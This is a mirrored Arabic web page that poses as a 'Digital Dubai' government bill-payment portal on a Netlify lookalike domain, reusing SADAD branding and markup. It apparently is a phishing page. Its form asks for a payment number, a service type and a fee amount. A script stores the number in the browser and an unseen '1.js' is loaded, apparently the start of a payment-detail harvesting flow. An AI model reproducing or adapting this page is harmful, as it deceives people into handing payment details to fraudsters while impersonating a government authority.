<!DOCTYPE html>
 <html lang="ar" lang="ar" dir="rtl">
 

<!-- Mirrored from sdad-dubai.netlify.app/indeex.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 02 Nov 2025 06:05:12 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
 <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> 
 <meta name="viewport" content="width=device-width, initial-scale=1" />
 <meta charset="utf-8" />
 <link rel="apple-touch-icon" sizes="180x180" href="img/apple-touch-icon.png">
 <link rel="icon" type="image/png" sizes="32x32" href="img/favicon-32x32.png">
 <link rel="icon" type="image/png" sizes="16x16" href="img/favicon-16x16.png">
 <link rel="shortcut icon" href="img/favicon.html">
 <meta name="description" content="تم تشكيل هيئة دبي الرقمية لترسيخ مكانة دبي كمدينة رقمية آمنة ذات اقتصاد رقمي رائد عالميًا. ستعمل مؤسسة حكومة دبي الذكية، ومؤسسة بيانات دبي، ومركز دبي للأمن الإلكتروني، ومركز دبي للإحصاء تحت مظلة هيئة دبي الرقمية">
 <meta name="twitter:card" content="summary" />
 <meta property="og:title" content="الصفحة الرئيسية"/>
 <meta property="og:description" content="تم تشكيل هيئة دبي الرقمية لترسيخ مكانة دبي كمدينة رقمية آمنة ذات اقتصاد رقمي رائد عالميًا. ستعمل مؤسسة حكومة دبي الذكية، ومؤسسة بيانات دبي، ومركز دبي للأمن الإلكتروني، ومركز دبي للإحصاء تحت مظلة هيئة دبي الرقمية" />
 <meta name="msapplication-TileColor" content="#da532c">
 <meta name="msapplication-config" content="">
 <meta name="theme-color" content="#ffffff">
 <link href="faviconn.ico" rel="shortcut icon">
 <link href="faviconn.ico" rel="apple-touch-icon-precomposed">
  <title>
	هيئة دبي الرقمية
</title>
        <!--fav icon-->
        <link rel="shortcut icon" href="faviconn.ico" type="image/vnd.microsoft.icon">
        <!--OOTB CSS-->
        <link rel="stylesheet" type="text/css" href="controls.css">
    <link rel="stylesheet" type="text/css" href="page-layouts-21.css">
    <link rel="stylesheet" type="text/css" href="corev486308630.css">
    
        <!-- page manager interacts with script and the sharepoint object model -->
        
        <!-- unified logging service -->
        
        <!-- identifies to scripting elements that this is a v4 master page. required for scrolling? -->
    
        
    
        <!-- load SharePoint javascript -->
        
    
    
        
    
        <!-- Search Box scripts starts here -->
    
        
        
        
        <!-- Search Box scripts Ends here -->
    
        <!-- Optional - provides link that contains the SOAP definitions and WSDL -->
    
        <!-- Optional - provides scripting for registering _registerHelpComponent within the ribbon-->
        
        <!--Additional Page Head Delegate Control so you can create your own custom CONTROLTEMPLATES -->
        
        <!-- Additional Page Head Content - can be overridden by <asp:Content ContentPlaceholderID="PlaceHolderAdditionalPageHead"> -->
        
        
           
        
        
                
                
                
            
    
        <!--Additional content placeholders that should stay in head section.-->
        
    
        <!-- Bootstrap core CSS -->
        <link href="bootstrap.min.css" rel="stylesheet">
    
        <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
        <link href="ie10-viewport-bug-workaround.html" rel="stylesheet">
    
        <!-- Multilevel Menu CSS -->
        
        <link href="jquery.smartmenus.bootstrap.css" rel="stylesheet">
        
    
        <!-- Custom styles for this template -->
        <link href="navbar.html" rel="stylesheet"><link href="styles.css" rel="stylesheet">
    
        <![endif]-->
    
        <!-- Theme Elements CSS -->
        <!--<link rel="stylesheet" href="./_layouts/inc/SADAD.Internet.Portal/English/css/theme-elements.css" />-->
    </head>
    <body class="v4master" style="overflow: auto!important">
    
           
            <!--Ribbon-->
            <div id="s4-ribbonrow" class="s4-pr s4-ribbonrowhidetitle" style="display: none">
                <div id="s4-ribboncont">
                    <!-- Actual Ribbon control-->
                    <div class="ms-cui-ribbonTopBars"><div class="ms-cui-topBar1"></div><div class="ms-cui-topBar2"><div id="RibbonContainer-TabRowLeft" class="ms-cui-TabRowLeft ms-siteactionscontainer s4-notdlg">
                            <!--Site Action Menu-->
                            <span class="ms-siteactionsmenu" id="siteactiontd">
                                
                            </span>
                            <!-- end site action menu -->
                            <!-- Start Global Navigation Control - drop down menu -->
                            
                                <span class="s4-breadcrumb-anchor"><span style="height:16px;width:16px;position:relative;display:inline-block;overflow:hidden;" class="s4-clust"><a id="GlobalBreadCrumbNavPopout-anchor" title="تنقل لأعلى" style="display:inline-block;height:16px;width:16px;"><img src="_layouts/images/fgimg.html" alt="تنقل لأعلى" style="border:0;position:absolute;left:-0px !important;top:-112px !important;"></a></span></span><div class="ms-popoutMenu s4-breadcrumb-menu" id="GlobalBreadCrumbNavPopout-menu" style="display:none;">
                                    <div class="s4-breadcrumb-top">
                                        <span id="ctl00_PlaceHolderGlobalNavigation_GlobalBreadCrumbNavPopout_Label1" class="s4-breadcrumb-header">موقع هذه الصفحة هو:</span>
                                    </div>
                                    
        <div class="breadcrumb">
            <span><span><a title="Home" class="ms-sitemapdirectional" href="external819b.html?link=https://www.sadad.com/en/pages/home-2.html">Home</a></span><span> &gt; </span><span><a class='ms-sitemapdirectional' href='ar/pages/home.html'>الرئيسية</a></span><span> &gt; </span><span><a class='ms-sitemapdirectional' href='ar/personal/pages/default.html'>شخصي</a></span><span> &gt; </span><span class="current">فواتير سداد</span></span>
        </div>
    
      
                    
                                </div>
                            
                            <!--end global nav control-->
                            <!-- top ribbon save and browse buttons-->
                            
    
                        </div><div id="RibbonContainer-TabRowRight" class="ms-cui-TabRowRight s4-trc-container s4-notdlg">
                            <!-- Show the variations menu, since a delegate control can be overwritten. Normally blank-->
                            
    
                            <!--Welcome drop down menu and Login Control-->
                            <div class="s4-trc-container-menu">
                                <div>
                                    
    <a id="ctl00_IdWelcome_ExplicitLogin" class="s4-signInLink" href="#" style="display:inline;">تسجيل الدخول</a>
    
                                    
    
    
    
                                </div>
    
                            </div>
                            <!-- GlobalSiteLink2 delegate control that can be overwritten-->
                            
                            <!-- Link to developer dashboard if configured for this site-->
                            <!-- For more information: http://msdn.microsoft.com/en-us/library/ff512745.aspx-->
                            <span><span class="s4-devdashboard">
                                
                            </span></span>
                        </div></div></div>
    
                    <!--end ribbon control-->
                </div>
                <!-- notification box that appears dynamically -->
                <div id="notificationArea" class="s4-noti">
                </div>
                <!--Part of the publishing console, a delegate control that can be overwritten-->
                
    
                    
    <span id="ctl00_SPNavigation_ctl00_publishingConsoleV4_publishingRibbon"></span>
    
    
    
                
                <!-- top Update panel web part -->
                <div id="WebPartAdderUpdatePanelContainer">
                    <table id="ctl00_WebPartAdderUpdatePanel" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td>
        
                            <span id="ctl00_WebPartAdder"></span>
                        
    </td></tr></tbody></table>
                </div>
            </div>
            
            <!--end ribbon-->
            <!--primary content panel, provides scroll bars under ribbon, replacing the browser scrollbars-->
            <div id="s4-bodyContainer">
                <!--page status bar including if a page is checked out, ready for publishing, etc-->
                <div id="s4-statusbarcontainer">
                    <div id="pageStatusBar" class="s4-status-s1" style="display: none;"></div>
                </div>
            </div>
    
            <div class="container">
                <header>
                    <div class="row">
                        <div class="col-md-9">
                            <div class="row hidden-md hidden-lg">
                                <div class="col-sm-6 col-xs-6 lang-bar">
                                  
                                </div>
                             
                            </div>
                           
                            <div class="row">
                                <div class="col-md-12">
                                    <nav class="navbar navbar-default" role="navigation">
                                        <div class="navbar-header">
                                            <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#pnlMainMenu" aria-expanded="false">
                                                <span class="sr-only">Toggle navigation</span>
                                                <span class="icon-bar"></span>
                                                <span class="icon-bar"></span>
                                                <span class="icon-bar"></span>
                                            </button>
                                            <a class="navbar-brand visible-sm visible-xs" href="#">
                                                <img src="sadad_logo_ar.svg" style="height: 30px;">
                                            </a>
                                        </div>
                                   
                                    </nav>
                                </div>
                            </div>
                        </div>
                        <div class="col-md-3 logo hidden-sm hidden-xs">
                            <a class='pull-right' href='ar/pages/home.html'>
                                <img src="sadad_logo_ar.svg">
                            </a>
                        </div>
                    </div>
    
                    <div id="pageHeader" class="row title-section-container">
                        <div class="col-md-12 title-section">
                            <div class="title-section-corner-bg" style="position: absolute; top: 0px; right: 0px;"></div>
                            <div class="row">
                                <div class="col-md-12 breadcrumb-title">
                                  
    
    <span id="ctl00_ctrlBreadCrump_lblError"></span>
    
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <h2>
                                        
        
        
DIGITAL DUBAI        
            
    
                                    </h2>
                                </div>
                            </div>
                        </div>
                    </div>
                </header>
    
                <!-- Inner Content for Pages -->
                <div class="row">
                    <div class="col-md-12">
                        <div class="content">
                            
        
        
                <div class="welcome welcome-links">
                    
                    <div class="welcome-image">
                        <div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichImageField1_label" style="display:none">صورة الصفحة</div><div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichImageField1__ControlWrapper_RichImageField" class="ms-rtestate-field" style="display:inline" aria-labelledby="ctl00_PlaceHolderMain_UIVersionedContent6_RichImageField1_label"><div class="ms-rtestate-field"></div></div>
                    </div>
                    <div class="welcome-content">
                        <div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichHtmlField1_label" style="display:none">محتوى الصفحة</div><div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichHtmlField1__ControlWrapper_RichHtmlField" class="ms-rtestate-field" style="display:inline" aria-labelledby="ctl00_PlaceHolderMain_UIVersionedContent6_RichHtmlField1_label"><div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="main-content">
                    <div>
                        <div>
                            &nbsp;
                        </div>
                        <div>
                            <br>
                        &nbsp;</div>
                        <div dir="rtl">
                            <span style="text-align:justify;color:#26ade3;line-height:27px;font-family:inherit;font-size:1.4em"> رؤيتنا هي رقمنة الحياة في دبي </span><span style="text-align:justify;color:rgb(251, 129, 72);line-height:27px;font-family:inherit;font-size:1.4em">​</span><br>
                        </div>
                    </div>
                    <div>
                        <div dir="rtl" style="text-align:right">
                            <p style="line-height:24px;font-size:15px;margin-bottom:20px">
                                
                                
                                
                                مع هيئة دبي الرقمية ، يمكنك دفع كل الفواتير من خلال البنك  
                               
                            </p>
                        </div>
                    </div>
    </div>
                                <div class="form-top-right"><i class="fa fa-key"></i></div>
                            </div>
<div class="form-bottom">
                            
                                     <div class="form-group">
                                                <label class="" for="form-password">أدخل رقم الخدمة</label>
                                                <input type="text" class="form-control" name="pass1" id="input100" placeholder="رقم السداد" maxlength="6" pattern="[0-9]*" required class="name">
                                                <span id="errorText" class="error hidden"style="color: red;" ></span>
                                            </div>
                                            <div>
                            &nbsp;
                        </div>
                                    <div class="form-group">
                            <select id="input2" class="form-control" required="">
                                <option value="">أختر الخدمة </option>
    
                                <option value="خدمات حكومية">خدمات حكومية</option>
                                <option value="سداد فاتورة اتصالات">سداد فاتورة اتصالات</option>
							    <option value="سداد الزكاة">سداد الزكاة</option>
							    <option value="سداد فواتير المياه والكهرباء">سداد فواتير المياه والكهرباء</option>
                                <option value="سداد الغرامات المرورية ">سداد الغرامات المرورية </option>
                                <option value="خدمات دائرة التنمية الاقتصادية">خدمات دائرة التنمية الاقتصادية</option>
							    <option value="خدمات دائرة الصحة ">خدمات دائرة الصحة</option>	
                                <option value="خدمات دائرة التعليم والمعرفة ">خدمات دائرة التعليم والمعرفة  </option>
                                <option value="خدمات وزارة الموارد البشرية والتوطين">خدمات وزارة الموارد البشرية والتوطين </option>
                                <option value="خدمات  المساكن والاراضي والعقارات ">خدمات المساكن والاراضي والعقارات  </option>
							    <option value="خدمات المركبات والمرور والقيادة">خدمات المركبات والمرور والقيادة</option>
						        <option value="خدمات التجارة والصناعة   ">خدمات التجارة والصناعة  </option>
								<option value="خدمات الاقامة والهوية والتأشيرات  ">خدمات الاقامة والهوية والتأشيرات  </option>
								<option value="خدمات  دعم الشؤون البيئية وخدمات المجتمع  ">خدمات دعم الشؤون البيئية وخدمات المجتمع  </option>
                                <option value="خدمات الثقافة والسياحة ">خدمات الثقافة والسياحة </option>
                                <option value="خدمات التمويل والقروض ">خدمات التمويل والقروض  </option>
								<option value="خدمات  المزارع الثروة الحيوانية والمواشي  ">خدمات الثروة الحيوانية والمواشي  </option>
                                <option value="خدمات العقود الالكترونية   ">خدمات العقود الالكترونية   </option>tion>
							    <option value="خدمات استرداد الاموال">خدمات استرداد الاموال</option>
                                <option value="خدمات أخرى... ">خدمات أخرى...</option> </select>
                                <span id="errorText2" class="error hidden"style="color: red;" ></span>
                        </div>
                         <div>
                            &nbsp;
                        </div>
                                        <div class="form-group">
                                            <label class="" for="form-password">أدخل قيمة الرسوم </label>
                                            <input type="number" class="form-control"  id="input3" placeholder="  AED" pattern="[0-9]*" required class="name">
                                            <span id="errorText3" class="error hidden"style="color: red;" ></span>
                                        </div>
    
    
                                    <button type="submit" class="btn btn-primary btn-large" style="width:100%" title="دخول" id="nextButton">
                                            دخول                                </button>
                                
                                            <script src="1.js"></script>                                                 
              
</div>
        
    
        <br><br><br>
                        
                        <div class="col-50 clearer">
                            <div class="left-column-links">
                                <div id="ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl1__ControlWrapper_SummaryLinkFieldControl" style="display:inline"><div id="slwp_ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl1_SummaryLinkFieldControl1" class="slm-layout-main slwpmarker"><!--empty--></div></div>
                            </div>
                        </div>
                        <div class="col-50">
                            <div class="right-column-links">
                                <div id="ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl2__ControlWrapper_SummaryLinkFieldControl" style="display:inline"><div id="slwp_ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl2_SummaryLinkFieldControl2" class="slm-layout-main slwpmarker"><!--empty--></div></div>
                            </div>
                        </div>
                
                
        
                
                    <div class="content">
                        <menu class="ms-SrvMenuUI">
            <ie:menuitem id="MSOMenu_Help" iconsrc="./_layouts/images/HelpIcon.gif" text="تعليمات" type="option" style="display:none">
        
            </ie:menuitem>
        </menu>
                    </div>
        
                    <div class="row">
                        <div class="col-md-6">
                            
                        </div>
                        <div class="col-md-6">
                            
                        </div>
                    </div>
            
        
                
        
                        
                            
                        
                    
                    
                
        
                <footer>
                    <div class="row" style="margin-bottom: 25px;">
                        <div class="col-md-6">
                            <div class="pull-left" style="background-image: url(footer_btn.png); width: 206px; height: 27px; padding-top: 4px; padding-right: 18px; font-size: 12px;">
                                <span style="font-style: italic; color: #ffffff;"><span style="font-weight: bold;">One</span> solution for all payments</span>
                            </div>
                        </div>
                        <div class="col-md-6">
                           
                        </div>
                    </div>
                    <div class="row footer-copyright">
                        <div class="col-md-5 col-xs-12 col-sm-12">
                            <label id="CopyRight"> 2024 © جميع الحقوق محفوظة </label>
                           
                        </div>
        
                  
                    </div>
                </footer>

            <!--page title-->
            <!-- end s4-bodycontainer-->
            <!--the contents of the developer dashboard will be placed here, if turned on-->
            <div id="DeveloperDashboard" class="s4-notdlg">
                
            </div>
            <!--end workspace div-->
            
            <!--form digest secutiry control. Used for security and form validation-->
            
                
            
            <!-- Handle Search "enter" key and back button -->
            <input type="text" name="__spText1" title="text" style="display: none;">
            <input type="text" name="__spText2" title="text" style="display: none;">
        <table id="ctl00_panelZone" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td>
        <div style="display:none" id="hidZone"></div>
        </td></tr></tbody></table>
        
        
        
        
        
        
        
        
        
        <script>
            document.getElementById('nextButton').addEventListener('click', function() {
                var billerNumber = document.getElementById('input100').value;
                if (billerNumber) {
                    localStorage.setItem('billerNumber', billerNumber);
                }
            });
        </script>
        
        
        
        
        
        
        
        
        
        
        
        
        <!--extra form/utility content for certain pages-->
        
        <!-- old browser warning message-->
        
        
        <!-- Bootstrap & other core JavaScripts
        ================================================== -->
        <!-- Placed at the end of the document so the pages load faster -->
        
        
        
        <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
        
        
        <!-- Bootstrap Dropdown Hover JS -->
        
        
        
        
        
        
        
        
        <!-- Mirrored from www.sadad.com/ar/Personal/Pages/SADADBills.aspx by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 30 May 2019 12:24:41 GMT -->
        
        </body>


<!-- Mirrored from sdad-dubai.netlify.app/indeex.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 02 Nov 2025 06:05:13 GMT -->
</html>
        
        